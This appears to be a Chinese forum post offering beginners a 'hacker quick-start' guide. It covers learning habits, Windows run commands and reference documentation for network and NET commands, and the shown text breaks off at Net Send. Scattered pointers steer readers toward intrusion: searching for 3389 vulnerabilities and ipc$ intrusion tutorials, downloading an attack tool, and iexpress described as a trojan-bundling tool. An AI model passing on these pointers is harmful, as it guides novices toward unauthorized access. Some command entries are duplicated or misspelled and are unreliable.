菜鳥黑客速成法(只供学习,非法滥用,后果自负)

一 序言

看到不少刚入门的菜鸟找不到适合自己的hack学习方法,到处碰壁,不但损伤信心和兴趣,而且也耽误了不少高贵的时间和金钱,做了许多无用功,到头来毫无收获。
因此我总结了一下我个人的一些学习方法与心得(当然有一些方法也是网上的朋友教我的),希望能给刚入门的朋友一些参考,使其少走弯路。如果您是一只老鸟,觉得这个教程对您毫无帮助,那么请您跳过此教程,毕竟不是所有人都像您一样掌握了良好的学习方法,那些迷惑中的菜鸟,正需要这样一个教程!
以下序号不分先后,希望大家也能拿出你们自己的心得体会来补充。

2楼、具体hack学习方法
3楼、运行命令集合
4楼、DOS下网络命令详解
5楼、NET命令基本用法
6楼、下面我们看看NET命令在WIN98下的基本用法
7楼、网络黑客新手入门指南
8楼、菜鸟常用命令 <给新手学习>
9楼——11楼、2000命令集
12楼、端口的使用
13楼、常用端口关闭方法
14楼、网络安全术语解释
15楼、黑客基础入门(新手进阶)

1 利用搜索引擎
这是一种高效的学习方法,相信每个高手都从这里受益匪浅,这也是菜鸟最好的老师,她随叫随到,言听即从,力量强大。强烈建议大家在遇到问题前,先请教一下www.Google.com

1)公共搜索引擎
比如大名鼎鼎的Google(别告诉我你不知道哟),还有百度等。利用这类搜索引擎,你几乎可以搜到任何你想要的东西,比如:文章,教程,软件,安全站点,安全论坛,一切的一切。
所以以后不要再问诸如3389是什么端口(去搜一下3389+空格+端口+空格+漏洞);流光在哪里下载(去搜流光+空格+工具+空格+下载);ipc$怎样利用(去搜ipc$Content$空格+入侵+空格+教程)等完全可以向搜索引擎请教的问题,如果你非要问一下,没关系,你会得到简单明了的答案:‘去搜!!’请不要埋怨这位高手不耐心,面对千百个这样的菜鸟问题,他这么做已经很人道了。
因此可以看出,掌握良好的学习技巧对菜鸟来说是多莫重要,不少菜鸟就是因为像这样到处碰壁后,最终放弃了hack学习。
*不会利用搜索引擎对菜鸟来说是致命的,你将举步为艰,反之,你将进步神速。

2)站点内部/论坛的搜索引擎
使用方法上大同小异,比如你现在需要一篇教程或是一个hack软件,而你又觉得google上搜出来的东西太杂或觉得没有专业性,那么这时候你就可以到各大安全站点或论坛上去搜索,比如www.heibai.net;安全焦点;红客联盟;小榕的论坛;www.20cn.org等,在这些站点的内部引擎里搜到的教程或软件,一般都是比较有保证的。
*如果你是一只想飞的菜鸟,那么就学着去搜索吧。

2 阅读书籍
hack学习中,书籍是必不可少的,这个我不用多少,只是希望大家能有选择的购买书籍,找到最适合自己的那一种。

1)基础知识类:一般来说菜鸟的基础是比较差的,甚至一些基本常识都不知道,因此有几本基础知识的书作为参考是必不可少的,比如关于TCP/IP,网络,操作系统,局域网等,甚至是关于DOS,windows基础的书都是很有必要的。在读书的过程中,你一定会遇到许多不懂的名字或术语,该怎么办呢?白学了??去搜索吧!!
注意:此类书籍关键在于它的通俗易懂性,不要追求多莫深入,对菜鸟来说,急于求成是最要不得的。因为我还是学生,因此学校的图书馆是很好的书源(主要是免费),我几乎借遍了所有hack方面书籍,如果你已经不是学生,建议你到各大图书馆去借,因为这样要比买书不知省多少钱。
*菜鸟准备2-4本即可

2)大众杂志类
此来书籍的精华在于它的合订本,比如电脑报合订本,电脑应用文萃合订本等等,就相当于一个大百科,分类详细,内容丰富,每年买上一两本就足够了,你会从中受益匪浅。
注意:此类书籍的优势在于内容全面,各个方面都能涉及到,查找方便,但因其定位在大众杂志,内容相对比较基础,适合菜鸟做全方位了解。
*菜鸟准备1-2本即可

3)hack杂志类
比如《黑客防线》,《黑客X档案》等,此类杂志专业性强,内容由浅入深,讨论详细,并附送光盘,对比较富裕的朋友来说是个不错的选择,当然,你也可以到网上找一些电子版,下载观看。
注意:这是一种比较好的入门方法,许多朋友都是在无意中买了此类杂志后,才开始对hack技术感兴趣的。
*菜鸟不定期购买即可,如果你经济确实不富裕,可以放弃,或找电子版观看

3 察看教程
教程大部分发布于网上,你可以到各大安全站点的文章系统中去找,或者去相关论坛或Google搜索。这是一种令人兴奋的学习方法,一篇好的教程能让你进步飞快,如果你能找到一些专业而又详细的教程,你的hack学习将会事半功倍,因为教程比书籍读起来更亲切,而且语言通俗易懂,寻找方便(如果是书籍,那要买多少本啊),而且他最大的特点在于百家争鸣,对于同一个问题可能有很多的教程,你可以一一观看,从中总结出最精华的部分。
注意:由于任何人都可以发布教程(当然,好的安全站点是有验证机制的),所以一些个别教程并不能保证其正确性,或者不能保证在任何情况下都具有正确性,因此在阅读时要有所取舍。还有,一些老的教程其内容或所涉及软件可能不再适用,请大家注意这点。
另外,现在比较流行动画教程,这种教程的优点在于直观,对菜鸟中的菜鸟帮助很大(许多菜鸟只看的懂动画教程),但我个人更倾向于文字教程,原因:连文字教程都看不懂,还做什么hacker,看动画教程只会让你越来越懒,而不愿再去思考(个人观点)。当然,有些文字教程写得的确很烂,读了以后让人更晕。
*这是菜鸟必须掌握而且要会灵活运用的学习方法

4 在论坛上学习/交流
论坛是菜鸟成长必不可少的基石,如果你能找到一个管理严格,技术含量高,充满活力的论坛,那么我真的要祝贺你,因为你将在这个论坛中学到许多许多东西。那么如何使用一个论坛呢?如下:
1)留意精华版:这是一个论坛的精华所在,所有一级棒的帖子几乎都在这里了,慢慢的读吧,你会收获很多。
2)提问前先搜索:这是许多菜鸟忽略的问题,如果你不注意,将浪费你很多时间,原因是这样的:菜鸟一般所提的问题就那么几十个,在一个稍微老一些的论坛上基本上应该都有人提过了,而且是不止一次的提过了,因此你事先搜索一下,应该会搜到不止一篇的帖子,在这些帖子的回复中,应该有你想要的答案,但如果你不去搜索而直接提问,那么你将花费一定的时间去等待回复,这就是浪费,况且大部分高手都反感提问简单而重复的问题,那么你得到的回复也许将更加粗略而潦草,这更是浪费。所以,在提问前恳请你,现搜索一下问题吧!!
3)关注高手的帖子:一个论坛上一定会有几位高手,比如版主之类(至于怎么判定一个高手,就不用我多说了吧),他们的回复不但精彩,他们所发的帖子更值得关注,而这是大家常常忽略的问题,所以,在论坛上你可以试着搜一下这位高手的用户名,那么他所有的帖子将展现在你面前,仔细看看吧,高手的帖子就是不一样吧。
4)热点的帖子:一般体现在回复率上,这类帖子并不一定是关于技术的,但他一定是人们现在最关心的(否则哪里会有那么多回复),多看看这类帖子,你将获得更丰富的知识。
5)高效的提问:对于同样的一个问题,不同的提问方式,将会受到不同的效果,能得到你最想要得答案,就是高效的提问。那么如何高效的提问呢?

(1)帖子标题写清楚:像‘快来救我呀’‘谁知道为什么’‘高手请进’这类的帖子,我是很少光顾的,一个好的标题要能概括帖子的主要内容;
(2)内容尽量详细:原因很简单,连问题都说不清楚,谁会帮你,谁能帮你(神仙??);要说明问题出现的环境,不同的环境会有不同的结果;
(3)提问前作最大的努力:请确认你在提问前已经尽了最大努力,但还是没有效果。如果你打算提一些懒人的问题,比如‘我找不到流光的下载,请高手发到我的邮箱好吗’‘谁会net命令呀,教我’,那么所有人将会鄙视你,很难想象懒汉当了hacker会是什么样子;
(4)感谢帮助你的人:这是最起码的作人礼仪。

6)融入论坛:在你的能力范围内,给予他人最大的帮助。
*论坛对菜鸟就像空气一样重要,去找一个适合你的论坛吧。

5 与高手直接交流
这也许是最最高效的学习方法了,能与高手直接交流是一件多么美妙的事情阿,但如果使用不当,也会给自己和对方带来许多不快。
1)如果你与这位高手认识甚至是好朋友,那问题很好办,进轻的提问吧,只要不是很过分就行;
2)如果你与这位高手素昧平生,那还是谨慎一点,不要一股脑提许多问题,因为大家得时间都是宝贵的,他不可能花许多时间来专为你一个人服务,因此建议你慢慢来,每次提1-2个问题就好,因为还有下次嘛!
3)不要轻易打扰别人,以下方式请慎用:oicq,mail,homephone,
4)要尊重对方,不要过于奢求,在这个功利的社会,要学会被拒绝,再说人家也没有义务必需要给你解答问题。
*能得到高手的帮助当然最好,如果没有路子,也不要强求,相信你自己也能行。

三 具体切入点

写到这里了,一些菜鸟说仍然找不到切入点,不知道该从何入手,说哪里都不明白,看什么都看不懂,无法入门。也难怪,菜鸟嘛,的确很难入手,有些朋友就是因为前期的学习很吃力才放弃了的,那么好,我就继续介绍我本人的两个方法吧。

1基础书籍法:既然基础差,那么就从基础开始,去买一至两本hack方面的既基础又全面的书籍来看,比如《黑客就这么几招》等等,此类书籍比较基础,但又很全面,黑客初期的基本攻击方法都有介绍,以此类书为基础慢慢的学习,过一段时间你会发现你已经入门了;

2教程解惑法:就是说一旦遇到不明白的地方就通过搜索引擎,资料,教程来解答,在求解的过程中,你一定还会关联的遇到其他不懂的新问题,那么好,继续找资料看教程,就这样一直连续不断,遇到不懂的就去看,不管他是哪方面的,慢慢的,你所懂的会越来越多,你会发现你已经入门了。此类方法有很大的随意性,不是很系统,但灵活自由,高效;

3结合法:就是将以上两种方法结合,这是很好的一种方法,建议大家使用。

四 总结

以上基本上是我个人的一面之谈,难免主观一些,请海涵。如果你还有什么好的学习方法,请一定要告诉我,我会收入到这片帖子当中,希望她能对菜鸟们有所帮助。

网络必备知识

(一).网卡安装故障检查方法
如果无法安装网卡驱动程序或安装网卡后无法登录网络,请按下述步骤检查处理:

1.选择“控制面板”/“系统”图标,打开“系统属性”窗口;

2.在“系统属性”窗口的“设备管理”标签的“按类型查看设备列表”中,双击“网络适配器”条目前的“+”号将其展开,其下应当列出当前网卡;

3.如果“设备管理”标签中没有“网络适配器”条目或当前网卡前有一“X”号,说明系统没能识别网卡,可能产生的原因有网卡驱动程序安装不当、网卡硬件安装不当、网卡硬件故障等等;

4.如果网卡前有一带圆圈的“!”,说明系统找到了网卡,但网卡不能正常工作,请选定网卡后按“属性”按钮,打开“网卡属性”单;

5.如果网卡不能正常工作,在“网卡属性”窗口“常规”标签的“设备状态”栏目中会给出故障类型和推荐的解决方法;如果存在资源冲突,在“资源”标签中的“冲突设备列表”中通常会给出与网卡发生冲突的设备以及冲突的IRQ中断号或I/O地址。对有些PCI网卡,用上述方法无法检查到资源冲突,可选择“开始”/“程序”/“附件”/“系统工具”/“系统信息”打开“Microsoft系统信息”窗口,双击左边窗口“系统信息”框中“硬件资源”条目前的“+”号将其展开后,能检查到资源冲突。

(二).网卡设置资源冲突处理方法

网卡非常容易与其它设备发生资源冲突,尤其是在系统中安装有多只接口卡的情况下,资源冲突常采用以下几种方法处理。

方法一:在上述“网卡属性”窗口“资源”标签的“资源类型”列表中选定发生冲突的“资源”,按“更改设置”按钮,更改发生冲突的IRQ中断号或I/O地址;

方法二:早期网卡常强行占用IRQ3,与COM2发生IRQ中断冲突,如果用户不使用COM2,可在BIOS中将“Onboard UART Port”项设置为Disabled,关闭COM2;

方法三:有些PCI网卡会强行占用IRQ10,与一些强行占用IRQ10的显示卡发生IRQ中断冲突,可在BIOS中将“Assign IRQ For VGA”项设置为Disabled,不给显示卡分配固定的中断;

方法四:运行网卡程序软盘中的设置程序,将网卡设置为非PNP模式(jumpless),设置IRQ中断号和I/O地址为系统未占用的地址;并在BIOS中将相应中断号由PCI/ISA改为Legacy ISA;

方法五:升级网卡BIOS,这种方法要求网卡使用的是Flash ROM,还需要去相应网站下截高版本网卡BIOS更新程序。如果用户采用上述方法均不能解决故障,建议您换一块网卡试试。

(三)在“网上邻居”中除了“整个网络”,什么也没有,点击“整个网络”,告诉你无法浏览。

cmd.exe-----------------DOS命令提示符
regedit.exe--------------注册表
gpedit.msc---------------组策略
Msconfig.exe-------------系统配置实用程序
services.msc--------------本地服务设置
regsvr32 /u zipfldr.dll----屏蔽XP的ZIP解压功能
regsvr32 zipfldr.dll ------ 开启XP的ZIP解压功能
regsvr32 /u *.dll----------停止dll文件运行
iexplore -channelband —收藏夹
netstat -na --------------- 查看打开的端口
chkntfs /t:0 -------------- 设置开机时磁盘检查的等待时间为0
ipconfig /all-------------- 查看本机IP及网关等
winchat--------XP自带局域网聊天
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc— 设备管理器
notepad--------打开记事本
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc—磁盘管理实用程序
calc-----------启动计算器
chkdsk.exe-----Chkdsk磁盘检查
drwtsn32------ 系统医生
winmsd---------系统信息
sfc /scannow—扫描错误并复原
taskmgr--------任务管理器(2000/xp/2003)
net stop messenger----停止信使服务
net start messenger—开始信使服务
oobe/msoobe /a--------检查XP是否激活
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc—计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
control userpasswords2------ 设置XP自动登录
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
sndrec32-------录音机
Nslookup-------IP地址侦测器
explorer-------打开资源管理器
logoff---------注销命令
tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组
cleanmgr-------垃圾整理
compmgmt.msc—计算机管理conf-----------启动 netmeeting
dvdplay--------DVD播放器
charmap--------启动字符映射表
diskmgmt.msc—磁盘管理实用程序
dfrg.msc-------磁盘碎片整理程序
devmgmt.msc— 设备管理器
rononce -p ----15秒关机
rsop.msc-------组策略结果集
mem.exe--------显示内存使用情况
progman--------程序管理器
perfmon.msc----计算机性能监测程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc—移动存储管理员操作请求
syncapp--------创建一个公文包
sysedit--------系统配置编辑器

一、Arp: 显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。

该命令只有在安装了 TCP/IP 协议之后才可使用

arp -a [inet_addr] [-N [if_addr]]

arp -d inet_addr [if_addr]

arp -s inet_addr ether_addr [if_addr]

参数

-a 通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址。

-g 与 -a 相同。

inet_addr 以加点的十进制标记指定 IP 地址。

-N 显示由 if_addr 指定的网络界面 ARP 项。

if_addr 指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口。

-d 删除由 inet_addr 指定的项。

-s 在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定IP地址。项是永久性的,即在超时到期后项自动从缓存删除。

ether_addr 指定物理地址。

二、Finger 在运行 Finger 服务的指定系统上显示有关用户的信息。

根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP 协议之后才可用。

finger [-l] [user]@computer[…]

参数

-l 以长列表格式显示信息。

user 指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:

@computer

三、Ftp 将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机传送文件(有时称作 daemon)。Ftp 可以交互使用。

单击“相关主题”列表中的“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP 协议之后才可用。Ftp 是一种服务,一旦启动,将创建在其中可以使用 ftp 命令的子环境,通过键入 quit 子命令可以从子环境返回到 Windows 2000 命令提示符。当ftp 子环境运行时,它由 ftp 命令提示符代表。

ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]

参数

-v 禁止显示远程服务器响应。

-n 禁止自动登录到初始连接。

-i 多个文件传送时关闭交互提示。

-d 启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。

-g 禁用文件名组,它允许在本地文件和路径名中使用通配符字符(* 和 ?)。(请参阅

联机“命令参考”中的 glob 命令。)

-s: filename 指定包含 ftp 命令的文本文件;当 ftp 启动后,这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向 (>。

-a 在捆绑数据连接时使用任何本地接口。

-w:windowsize 替代默认大小为 4096 的传送缓冲区。

computer 指定要连接到远程计算机的计算机名或 IP 地址。如果指定,计算机必须是行的最

后一个参数。

四、Nbtstat 该诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。

该命令只有在安装了 TCP/IP 协议之后才可用。

nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

参数

-a remotename 使用远程计算机的名称列出其名称表。

-A IP address 使用远程计算机的 IP 地址并列出名称表。

-c 给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。

-n 列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS(其他节点类型)注册。

-R 清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件。

-r 列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows2000 计算机上,此选项返回要通过广播或 WINS 来解析和注册的名称数。

-S 显示客户端和服务器会话,只通过 IP 地址列出远程计算机。

-s 显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称。

interval 重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息。

五、Netstat 显示协议统计和当前的 TCP/IP 网络连接。

该命令只有在安装了 TCP/IP 协议后才可以使用。

netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

参数

-a 显示所有连接和侦听端口。服务器连接通常不显示。

-e 显示以太网统计。该参数可以与 -s 选项结合使用。

-n 以数字格式显示地址和端口号(而不是尝试查找名称)。

-s 显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。

-p protocol 显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或ip。

-r 显示路由表的内容。

interval 重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。
六、 Ping 验证与远程计算机的连接。

该命令只有在安装了 TCP/IP 协议后才可以使用。

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

参数

-t Ping 指定的计算机直到中断。 -a 将地址解析为计算机名。

-n count 发送 count 指定的 ECHO 数据包数。默认值为 4。

-l length 发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是65,527。

-f 在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。

-i ttl 将“生存时间”字段设置为 ttl 指定的值。

-v tos 将“服务类型”字段设置为 tos 指定的值。

-r count 在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台,

最多 9 台计算机。

-s count 指定 count 指定的跃点数的时间戳。

-j computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

-k computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

-w timeout 指定超时间隔,单位为毫秒。

destination-list 指定要 ping 的远程计算机。

七、 Rcp 在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制件。

rcp 命令是一个连接命令,从 Windows 2000 计算机发出该命令时,也可以用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序可以在 UNIX 计算机上使用,而在 Windows 2000 上不能使用,所以 Windows 2000 计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行 rshd 提供rcp 实用程序。

rcp [-a | -b] [-h] [-r] source1 source2 … sourceN destination

参数

-a 指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。 -b 指定二进制图像传输模式。没有执行回车/换行符转换。

-h 传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项,在rcp 命令行上指定隐藏文件的效果与文件不存在一样。

-r 将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目录,虽然即使源不是目录,使用 -r 也能够工作。但将没有递归。

source 和 destination

格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分,计算机将假定为本地计算机。如果省略了 [.user] 部分,将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名,其中包含句点 (.) 分隔符,则必须包含 [.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则 destination 必须是目录。

如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 () 打头,则假定相对于当前的工作目录。在 Windows 2000 中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程路径中使用转义字符(、" 或 '),以便在远程计算机中使用通配符。

八、 Rexec 在运行 REXEC 服务的远程计算机上运行命令。

rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。

rexec computer [-l username] [-n] command

参数

computer 指定要运行 command 的远程计算机。

-l username 指定远程计算机上的用户名。

-n 将 rexec 的输入重定向到 NULL。

command 指定要运行的命令。

九、 Route 控制网络路由表。

该命令只有在安装了 TCP/IP 协议后才可以使用。

route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]]

参数

-f 清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除。

-p 该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。

command 指定下列的一个命令。

命令目的 print 打印路由

add 添加路由

delete 删除路由

change 更改现存路由

destination 指定发送 command 的计算机。 mask subnetmask 指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255。

gateway 指定网关。

名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数。

metric costmetric 指派整数跃点数(从 1 到 9999)在计算最快速、最可靠和(或)最便宜的路由时使用。

十、在运行 RSH 服务的远程计算机上运行命令。

该命令只有在安装了 TCP/IP 协议后才可以使用。

rsh computer [-l username] [-n] command

参数

computer 指定运行 command 的远程计算机。

-l username 指定远程计算机上使用的用户名。如果省略,则使用登录的用户名。

-n 将 rsh 的输入重定向到 NULL。

command 指定要运行的命令。
十一、 Tftp 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。

该命令只有在安装了 TCP/IP 协议后才可以使用。 tftp [-i] computer [get | put] source [destination]

参数

-i 指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。

如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。

computer 指定本地或远程计算机。

put 将本地计算机上的文件 destination 传送到远程计算机上的文件 source。

get 将远程计算机上的文件 destination 传送到本地计算机上的文件 source。

如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 put。如果将远程计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 get。因为 tftp 协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。

source 指定要传送的文件。如果本地文件指定为 -,则远程文件在 stdout 上打印出来

(如果获取),或从 stdin(如果放置)读取。

destination 指定将文件传送到的位置。如果省略了 destination,将假定与 source 同名。

十二、 Tracert 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议(ICMP) 回显数据包发送到目标,以决定到达目标采用的路由。

要在转发数据包上的 TTL 之前至少递减 1,必需路径上的每个路由器,所以 TTL 是有效的跃点计数。数据包上的 TTL 到达 0 时,路由器应该将“ICMP 已超时”的消息发送回源系统。Tracert 先发送 TTL 为 1 的回显数据包,并在随后的每次发送过程将 TTL 递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。路由通过检查中级路由器发送回的“ICMP 已超时”的消息来确定路由。不过,有些路由器悄悄地下传包含过期 TTL 值的数据包,而 tracert 看不到。

tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout] target_name

参数

/d 指定不将地址解析为计算机名。

-h maximum_hops 指定搜索目标的最大跃点数。

-j computer-list 指定沿 computer-list 的稀疏源路由。

-w timeout 每次应答等待 timeout 指定的微秒数。

(1)NET VIEW

作 用:显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式:net view [computername | /domain[:domainname]]

参数介绍:(1)键入不带参数的net view显示当前域的计算机列表。

(2)computername 指定要查看其共享资源的计算机。

(3)/domain[:domainname]指定要查看其可用计算机的域。

简单事例:(1)net view YFANG查看YFANG的共享资源列表。

(2)net view /domainOVE查看LOVE域中的机器列表。

(2)NET USER

作用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。

命令格式:net user [username [password | *] [options]] [/domain]

参数介绍:

(1)键入不带参数的net user查看计算机上的用户帐号列表。

(2)username添加、删除、更改或查看用户帐号名。

(3)password为用户帐号分配或更改密码。

(4)*提示输入密码。

(5)/domain在计算机主域的主域控制器中执行操作。

简单事例:(1)net user yfang查看用户YFANG的信息

(3)NET USE

作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

命令格式:net use [devicename | *] [computernamesharename[volume]] [password | *]] [/user:[domainname]username] [[/delete] | [/persistent:{yes | no}]]

参数介绍:

键入不带参数的net use列出网络连接。

devicename指定要连接到的资源名称或要断开的设备名称。

computernamesharename服务器及共享资源的名称。

password访问共享资源的密码。

*提示键入密码。

/user指定进行连接的另外一个用户。

domainname指定另一个域。

username指定登录的用户名。

/home将用户连接到其宿主目录。

/delete取消指定网络连接。

/persistent控制永久网络连接的使用。

简单事例:

(1)net use e: YFANGTEMP将YFANGTEMP目录建立为E盘

(2)net use e: YFANGTEMP /delete断开连接

(4)NET TIME

作 用:使计算机的时钟与另一台计算机或域的时间同步。

命令格式:net time [computername | /domain[:name]] [/set]

参数介绍:

(1)computername要检查或同步的服务器名。

(2)/domain[:name]指定要与其时间同步的域。

(3)/set使本计算机时钟与指定计算机或域的时钟同步。

下面的这4个参数是相关的,所以一起介绍

(5)Net Start

作 用:启动服务,或显示已启动服务的列表。

命令格式:net start service

(6)Net Pause

作 用:暂停正在运行的服务。

命令格式:net pause service

(7)Net Continue

作 用:重新激活挂起的服务。

命令格式:net continue service

(8)NET STOP

作 用:停止 Windows NT 网络服务。

命令格式:net stop service

参数介绍:我们来看看这些服务都是什么

(1)alerter(警报)

(2)client service for netware(Netware 客户端服务)

(3)clipbook server(剪贴簿服务器)

(4)computer browser(计算机浏览器)

(5)directory replicator(目录复制器)

(6)ftp publishing service (ftp )(ftp 发行服务)

(7)lpdsvc

(8)net logon(网络登录)

(9)network dde(网络 dde)

(10)network dde dsdm(网络 dde dsdm)

(11)network monitor agent(网络监控代理)

(12)nt lm security support provider(NT LM 安全性支持提供)

(13)ole(对象链接与嵌入)

(14)remote access connection manager(远程访问连接管理器)

(15)remote access isnsap service(远程访问 isnsap 服务)

(16)remote access server(远程访问服务器)

(17)remote procedure call (rpc) locator(远程过程调用定位器)

(18)remote procedure call (rpc) service(远程过程调用服务)

(19)schedule(调度)

(20)server(服务器)

(21)simple tcp/ip services(简单 TCP/IP 服务)

(22)snmp

(23)spooler(后台打印程序)

(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)

(25)ups

(26)workstation(工作站)

(27)messenger(信使)

(28)dhcp client

(29)eventlog

以下这些SERVICE只能在NT SERVER上使用

(1)file server for macintosh

(2)gateway service for netware

(3)microsoft dhcp server

(4)print server for macintosh

(5)remoteboot

(6)windows internet name service

(9)Net Statistics

作 用:显示本地工作站或服务器服务的统计记录。

命令格式:net statistics [workstation | server]

参数介绍:(1)键入不带参数的net

statistics列出其统计信息可用的运行服务。

(2)workstation显示本地工作站服务的统计信息。

(3)server显示本地服务器服务的统计信息。

简单事例:(1)net statistics server | more显示服务器服务的统计信息

(10)Net Share

作 用:创建、删除或显示共享资源。

命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:“text”]

参数介绍:(1)键入不带参数的net

share显示本地计算机上所有共享资源的信息。

(2)sharename是共享资源的网络名称。

(3)drive:path指定共享目录的绝对路径。

(4)/users:number设置可同时访问共享资源的最大用户数。

(5)/unlimited不限制同时访问共享资源的用户数。

(6)/remark:"text "添加关于资源的注释,注释文字用引号引住。

简单事例:(1)net share mylove=c:temp /remark:"my first

share"以mylove为共享名共享C:temp

(2)net share mylove /delete停止共享mylove目录

(11)Net Session

作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。

命令格式:net session [computername] [/delete]

参数介绍:(1)键入不带参数的net

session显示所有与本地计算机的会话的信息。

(2)computername标识要列出或断开会话的计算机。

(3)/delete结束与computername计算机会话并关闭本次会话期间计算机的所有进程。

简单事例:(1)net session YFANG要显示计算机名为YFANG的客户端会话信息列表。

(12)Net Send

作 用:向网络的其他用户、计算机或通信名发送消息。

